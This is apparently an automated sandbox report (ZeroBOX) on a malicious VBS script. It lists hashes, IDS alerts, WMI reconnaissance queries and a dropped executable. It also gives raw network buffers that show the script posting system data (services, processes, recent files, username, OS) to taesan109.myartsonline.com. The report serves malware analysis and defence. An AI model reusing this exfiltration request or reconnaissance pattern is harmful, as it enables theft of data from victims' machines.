Summary | ZeroBOX

kaisjovrnal.blogspot.com.vbs

Category Machine Started Completed
FILE s1_win7_x6402 June 30, 2021, 3 p.m. June 30, 2021, 3:06 p.m.
Size 6.1KB
Type ASCII text, with CRLF line terminators
MD5 dd18c535de1431b53642cd31813906a4
SHA256 acae631795a9e5b676d4837739aca2eb1b057c73c60634587de3a1ab575e09fd
CRC32 BD15147E
ssdeep 192:ADeat+P8BlCqCSVXy+t34iBdEmtc7QRN2yoFzl0/dfpta1G:ADeat+PqlCqCSVXy+t34i7EmuURN2yoq
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
185.176.43.98 Active Moloch
211.231.99.17 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49809 -> 211.231.99.17:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49807 -> 185.176.43.98:80 2027117 ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49809
211.231.99.17:443
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=Thawte TLS RSA CA G1 C=KR, ST=Jeju-do, L=Jeju-si, O=Kakao Corp., CN=*.daum.net 67:7d:a8:dd:b7:e1:47:25:d5:d9:6c:3f:3c:e1:5b:43:0b:80:8b:69

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
suspicious_features POST method with no referer header suspicious_request POST http://taesan109.myartsonline.com/about/post/info.php?w=na&ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)
request POST http://taesan109.myartsonline.com/about/post/info.php?w=na&ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)
request GET https://www.daum.net/favicon.ico
request POST http://taesan109.myartsonline.com/about/post/info.php?w=na&ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)
file C:\Users\test22\AppData\Roaming\gi.exe
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\한글2010(정품).lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ok1.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\msi1.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Settings.ini.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\테스트.txt.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\doc2.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\attach.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test_zip_doc.eml.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\agent.pyw.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\시리얼넘버.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.txt.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\msi2.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\exe1.zip.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_History.txt.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test.eml.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.py.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ok2.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_Click.py.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Python27.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\util.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test (1).eml.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx2.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\sn.txt.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx1.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\agent.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\readme.txt.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\age.pyw.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test_doc.eml.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\office_2007.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.pyw.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\한글2010(정품) (2).lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\시작프로그램.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\doc.png.lnk
file C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\다운로드.lnk
wmi Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%'
wmi Select * from Win32_Process
wmi Select * from Win32_OperatingSystem
wmi Select * from Win32_Service WHERE state = "Running"
host 172.217.25.14
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /about/post/info.php?w=na&ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86) HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 2071 Host: taesan109.myartsonline.com
socket: 816
0 0

WSASend

buffer: v=aelookupsvc audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc kmservice lanmanserver lanmanworkstation lmhosts mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain tabletinputservice themes trkwks uxsms wcncsvc wdiservicehost winhttpautoproxysvc winmgmt wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe srvany.exe taskhost.exe kmservice.exe conhost.exe sppsvc.exe svchost.exe dwm.exe explorer.exe searchindexer.exe thunderbird.exe pw.exe audiodg.exe splwow64.exe searchprotocolhost.exe searchfilterhost.exe mobsync.exe pw.exe taskhost.exe cmd.exe conhost.exe wscript.exe pw.exe slui.exe wmiprvse.exe &r=age.pyw.lnk====agent.py.lnk====agent.pyw.lnk====attach.png.lnk====click.lnk====click.py.lnk====click.pyw.lnk====click.txt.lnk====desktop.ini====doc.png.lnk====doc2.png.lnk====docx.png.lnk====docx1.png.lnk====docx2.png.lnk====exe1.zip.lnk====msi1.png.lnk====msi2.png.lnk====Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk====office_2007.lnk====ok1.png.lnk====ok2.png.lnk====Python27.lnk====readme.txt.lnk====Settings.ini.lnk====sn.txt.lnk====test (1).eml.lnk====test.eml.lnk====test_doc.eml.lnk====test_zip_doc.eml.lnk====util.lnk====ZeroAI_Click.py.lnk====ZeroAI_Click.pyw.lnk====ZeroAI_History.txt.lnk====다운로드.lnk====시리얼넘버.lnk====시작프로그램.lnk====테스트.txt.lnk====한글2010(정품) (2).lnk====한글2010(정품).lnk====&un=test22&os=Microsoft Windows 7 Professional KN |C:\Windows|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====readme.txt====&tll=Chrome.lnk====desktop.ini====Internet Explorer.lnk====Windows Explorer.lnk====
socket: 816
0 0

WSASend

buffer: ok`Ü–ñ€G¤B×m7G)Ê} ÕØjþàj í ŽVì'Ö/5 ÀÀÀ À 28*ÿ www.daum.net  
socket: 828
0 0

WSASend

buffer: ͗šc#¬‹\iQLŒcž›*;¥ =¿¶¹#››áµå¿HµÁÛöJsbž´jÄ4“w´öpáØ {1¤z¦–2傫ð¥QzPv ‘÷É çYYANՒc¬Jk:Òðþ+jù„­Ñ— À7Ó¸„/g¢@‡Uÿ³³:–÷ýR‘D%ä×æá;¿²3w`­wþð?Ù0=k§åaäIÍrżWñ#Ո¾už°'±¯Á; ¥)@Hx Èh€b‹ú†B52wj^Xñ$Eúõ׀©J×Þ,ö1è ˆ±P½J$ÔܼÏtC+é‘ã¿F³® &éR´×0¡;}Pñò²*~H“,N¬,͏™‚úƒV\®»­øÍGm1ô†¶P"„“ɠ΋g
socket: 828
0 0

WSASend

buffer: ÐS`ãà#’Ÿäµ‰@eüˆˆ½Rvfû f°\¢˜Åø&T§æ7r!Ûë+Áf‡Çº8¿µ@x/T  I])‡’零öǜ¿[c…“è§ùlRwPgvørY~„ü[RªjLûpéõ2b×ðûPTQ€‡ÙÞü¯Q£c¹ÙoQŠCÞŠº/bîÜË ïYº™ËÉ/¾÷×.â:yǃƒlt0núԕ¿œJ"oÍRÊNƒN9žk?BMÙMÉôNë-j=ây7´û
socket: 828
0 0

WSASend

buffer: ąpۑG¬‘;,º-Q«‡ü–JËÓáþÈÀÍhâ}·ü‘
socket: 828
0 0
Time & API Arguments Status Return Repeated

WSASend

buffer: POST /about/post/info.php?w=na&ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86) HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 2071 Host: taesan109.myartsonline.com
socket: 816
0 0

WSASend

buffer: v=aelookupsvc audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc kmservice lanmanserver lanmanworkstation lmhosts mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain tabletinputservice themes trkwks uxsms wcncsvc wdiservicehost winhttpautoproxysvc winmgmt wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe srvany.exe taskhost.exe kmservice.exe conhost.exe sppsvc.exe svchost.exe dwm.exe explorer.exe searchindexer.exe thunderbird.exe pw.exe audiodg.exe splwow64.exe searchprotocolhost.exe searchfilterhost.exe mobsync.exe pw.exe taskhost.exe cmd.exe conhost.exe wscript.exe pw.exe slui.exe wmiprvse.exe &r=age.pyw.lnk====agent.py.lnk====agent.pyw.lnk====attach.png.lnk====click.lnk====click.py.lnk====click.pyw.lnk====click.txt.lnk====desktop.ini====doc.png.lnk====doc2.png.lnk====docx.png.lnk====docx1.png.lnk====docx2.png.lnk====exe1.zip.lnk====msi1.png.lnk====msi2.png.lnk====Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk====office_2007.lnk====ok1.png.lnk====ok2.png.lnk====Python27.lnk====readme.txt.lnk====Settings.ini.lnk====sn.txt.lnk====test (1).eml.lnk====test.eml.lnk====test_doc.eml.lnk====test_zip_doc.eml.lnk====util.lnk====ZeroAI_Click.py.lnk====ZeroAI_Click.pyw.lnk====ZeroAI_History.txt.lnk====다운로드.lnk====시리얼넘버.lnk====시작프로그램.lnk====테스트.txt.lnk====한글2010(정품) (2).lnk====한글2010(정품).lnk====&un=test22&os=Microsoft Windows 7 Professional KN |C:\Windows|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====readme.txt====&tll=Chrome.lnk====desktop.ini====Internet Explorer.lnk====Windows Explorer.lnk====
socket: 816
0 0

WSASend

buffer: ok`Ü–ñ€G¤B×m7G)Ê} ÕØjþàj í ŽVì'Ö/5 ÀÀÀ À 28*ÿ www.daum.net  
socket: 828
0 0

WSASend

buffer: ͗šc#¬‹\iQLŒcž›*;¥ =¿¶¹#››áµå¿HµÁÛöJsbž´jÄ4“w´öpáØ {1¤z¦–2傫ð¥QzPv ‘÷É çYYANՒc¬Jk:Òðþ+jù„­Ñ— À7Ó¸„/g¢@‡Uÿ³³:–÷ýR‘D%ä×æá;¿²3w`­wþð?Ù0=k§åaäIÍrżWñ#Ո¾už°'±¯Á; ¥)@Hx Èh€b‹ú†B52wj^Xñ$Eúõ׀©J×Þ,ö1è ˆ±P½J$ÔܼÏtC+é‘ã¿F³® &éR´×0¡;}Pñò²*~H“,N¬,͏™‚úƒV\®»­øÍGm1ô†¶P"„“ɠ΋g
socket: 828
0 0

WSASend

buffer: ÐS`ãà#’Ÿäµ‰@eüˆˆ½Rvfû f°\¢˜Åø&T§æ7r!Ûë+Áf‡Çº8¿µ@x/T  I])‡’零öǜ¿[c…“è§ùlRwPgvørY~„ü[RªjLûpéõ2b×ðûPTQ€‡ÙÞü¯Q£c¹ÙoQŠCÞŠº/bîÜË ïYº™ËÉ/¾÷×.â:yǃƒlt0núԕ¿œJ"oÍRÊNƒN9žk?BMÙMÉôNë-j=ây7´û
socket: 828
0 0

WSASend

buffer: ąpۑG¬‘;,º-Q«‡ü–JËÓáþÈÀÍhâ}·ü‘
socket: 828
0 0
file C:\Users\test22\AppData\Roaming\gi.exe
wmi Select * from Win32_Service WHERE state = "Running"